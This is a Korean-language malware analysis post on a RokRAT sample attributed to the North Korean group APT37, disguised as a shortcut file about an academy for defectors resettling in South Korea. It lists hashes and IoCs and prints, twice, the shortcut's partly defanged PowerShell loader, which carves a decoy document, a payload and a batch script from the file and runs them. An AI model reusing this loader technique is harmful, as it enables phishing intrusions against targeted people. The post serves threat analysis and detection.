북한 해킹 단체 APT37(리퍼,Reaper)에서 만든 RokRAT 악성코드-북한이탈 주민의 성공적인 남한정착을 위한 아카데미 운영.lnk(2025.7.21)
Contents
오늘은 북한 해킹 단체 APT37(리퍼,Reaper)에서 만든 RokRAT 악성코드에 대해 알아보겠습니다. 일단 해당 악성코드는 북한 이탈 주민의 성공적인 남한정착을 위한 아카데미 운영이라는 제목으로 돼 있으며 RokRAT 인 것을 확인할 수가 있으며 해시는 다음과 같습니다.
파일명:북한이탈주민의 성공적인 남한정착을 위한 아카데미 운영.lnk
사이즈:50 MB
MD5:443a00feeb3beaea02b2fbcd4302a3c9
SHA-1:65f79b9fa476e9aafec16a7995b39c72d4c5e341
SHA-256:ccb6ca4cb385db50dad2e3b7c68a90ddee62398edb0fd41afdb793287cfbe8e6
입니다.
악성코드 포함된 PowerShell 코드
StringData
{
namestring:
relativepath: not present
workingdir: not present
commandlinearguments: /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\Window
sPowerShell\v1.0\*rshell(.)exe /s /b /od') do call %a "($)d(i)rPath = Get-Locati
on; if($dirP(a)th -Match 'Sy(s)tem32' -or $di(r)Path -Match 'Pro(g)ram Files') {
$dirPath = '%tem(p)%'};$exs=@('(.)lnk');$lnkPath = Get-ChildI(t)em -Path $di(r)Pa
th -Recurse *.* -File | where {$_.e(x)tension -in $exs} | where-object {$_.length
-eq 0x03(1)C83C4} | Select-Object -ExpandProperty FullName ;$lnkFile=New-Object S
ystem.IO.FileStream($(l)nkPath, [System.IO.FileMode]::Open, [System(.)IO(.)FileAcc
ess]::Read);$lnkFile.Seek(0x0(0)001004, 0);$pdfFile=New-Object byte[] 0x0(0)033A00
;$lnkFile.Read($pdfFile, 0, 0x00033A00);$pdfPath = $lnkPath.replace('.lnk','(.)hwp
');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x0(0)034A04,0);$e
xeFile=New-Object byte[] 0x00(0)DB990;$lnkFile.Read($exeFile, 0, 0x000DB990);$exeP
ath=$env:temp+'\aio01(.)dat';sc $exePath $exeFile -Encoding Byte;$lnkFile(.)Seek(0x001
10394,0);$stringByte = New-Object byte[] 0x00000634;$lnkFile.Read($stringByte, 0, 0x0(
0)000634); $batStrPath = $env:temp+'\'+'aio02.dat';$string = [Text.Encoding]::GetEncod
ing('utf-8').GetString(()$s(t)ringByte);$string | Out-File -FilePath $batStrPath -Enco
ding ascii;$lnkFile.Seek(0x00(1)109C8,0);$batByte = New-Object b(y)te[] 0x0000014C;$ln
kFile.Re(a)d($batByte, 0, 0x0(0)00014C);$executePath = $env:temp+'\'(+)'aio0'+'3.b'(+)
'a'+'t'; Write-Host $executePath; Write-Host $batStrPat(h); $bastString = [System.Text
.Encoding]::UTF8.GetSt(r)ing($batByte);$bastString …
파일명:북한이탈주민의 성공적인 남한정착을 위한 아카데미 운영.lnk
사이즈:50 MB
MD5:443a00feeb3beaea02b2fbcd4302a3c9
SHA-1:65f79b9fa476e9aafec16a7995b39c72d4c5e341
SHA-256:ccb6ca4cb385db50dad2e3b7c68a90ddee62398edb0fd41afdb793287cfbe8e6
입니다.
악성코드 포함된 PowerShell 코드
StringData
{
namestring:
relativepath: not present
workingdir: not present
commandlinearguments: /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\Window
sPowerShell\v1.0\*rshell(.)exe /s /b /od') do call %a "($)d(i)rPath = Get-Locati
on; if($dirP(a)th -Match 'Sy(s)tem32' -or $di(r)Path -Match 'Pro(g)ram Files') {
$dirPath = '%tem(p)%'};$exs=@('(.)lnk');$lnkPath = Get-ChildI(t)em -Path $di(r)Pa
th -Recurse *.* -File | where {$_.e(x)tension -in $exs} | where-object {$_.length
-eq 0x03(1)C83C4} | Select-Object -ExpandProperty FullName ;$lnkFile=New-Object S
ystem.IO.FileStream($(l)nkPath, [System.IO.FileMode]::Open, [System(.)IO(.)FileAcc
ess]::Read);$lnkFile.Seek(0x0(0)001004, 0);$pdfFile=New-Object byte[] 0x0(0)033A00
;$lnkFile.Read($pdfFile, 0, 0x00033A00);$pdfPath = $lnkPath.replace('.lnk','(.)hwp
');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x0(0)034A04,0);$e
xeFile=New-Object byte[] 0x00(0)DB990;$lnkFile.Read($exeFile, 0, 0x000DB990);$exeP
ath=$env:temp+'\aio01(.)dat';sc $exePath $exeFile -Encoding Byte;$lnkFile(.)Seek(0x001
10394,0);$stringByte = New-Object byte[] 0x00000634;$lnkFile.Read($stringByte, 0, 0x0(
0)000634); $batStrPath = $env:temp+'\'+'aio02.dat';$string = [Text.Encoding]::GetEncod
ing('utf-8').GetString(()$s(t)ringByte);$string | Out-File -FilePath $batStrPath -Enco
ding ascii;$lnkFile.Seek(0x00(1)109C8,0);$batByte = New-Object b(y)te[] 0x0000014C;$ln
kFile.Re(a)d($batByte, 0, 0x0(0)00014C);$executePath = $env:temp+'\'(+)'aio0'+'3.b'(+)
'a'+'t'; Write-Host $executePath; Write-Host $batStrPat(h); $bastString = [System.Text
.Encoding]::UTF8.GetSt(r)ing($batByte);$bastString …
IoC
65f79b9fa476e9aafec16a7995b39c72d4c5e341
443a00feeb3beaea02b2fbcd4302a3c9
ccb6ca4cb385db50dad2e3b7c68a90ddee62398edb0fd41afdb793287cfbe8e6
443a00feeb3beaea02b2fbcd4302a3c9
ccb6ca4cb385db50dad2e3b7c68a90ddee62398edb0fd41afdb793287cfbe8e6